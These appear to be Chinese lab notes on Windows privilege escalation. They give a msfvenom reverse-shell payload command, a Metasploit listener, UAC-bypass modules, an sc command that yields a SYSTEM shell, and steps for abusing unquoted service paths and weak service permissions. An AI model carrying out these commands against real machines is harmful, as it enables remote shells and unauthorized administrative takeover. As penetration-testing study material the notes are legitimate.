权限提升:
systeminfo看补丁
官网找漏洞:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/securitybulletins2017
payloads下载:https://github.com/SecWiki/windows-kernel-exploits
这里用巴西烤肉:
pr.exe
新建用户:
UAC提权:
vista以后引入的安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。
当前获得的权限是存在于管理员组的时候但是并且是administrator这个用户,此时就可能需要我们进行绕过UAC的操作,否则虽然是管理员组但是实际上并没有管理员所对应的高权限操作,这个时候就需要bypass uac
msf提权:
新增windows10用户:
msf:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.146 LPORT=4444 -f exe -o payload.exe
下载:
切换账号:
没有vmtools,用共享文件夹:
监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.146
set lport 4444
exploit
guid:查看当前权限:
getsystem提权:
失败:
输入background
use exploit/windows/local/ask
set session 2
exploit
未成功。
除非管理员输入密码,建立新的会话
这两个模块:
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
没戏,成功几率小
也可以关注:exploit/windows/local/ 这里都是提权的内容
sc命令提权(administrator–>system):
sc命令类似于控制面板的服务,
sc Create syscmd binPath= “cmd /K start” type= own type= interact
sc start systcmd,就得到了一个system权限的cmd环境
不带引号的服务路径
当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。
带空格的路径要带引号
错误的配置看这条命令:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """
我们可以将msf的muma放到这个路径下下,然后重启机器,此时,反弹回来的shell,则是一个system的shell
一个叫program.exe,另一个叫Documents.exe。随便找个exe
重启一下:
不安全的服务权限:
即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它。
AccessChk工具可以用来查找用户可以修改的服务: accesschk.exe -uwcqv “Authenticated Users” * /accepteula accesschk.exe -uwcqv “user” * 也可以上传msf相关模块的muma
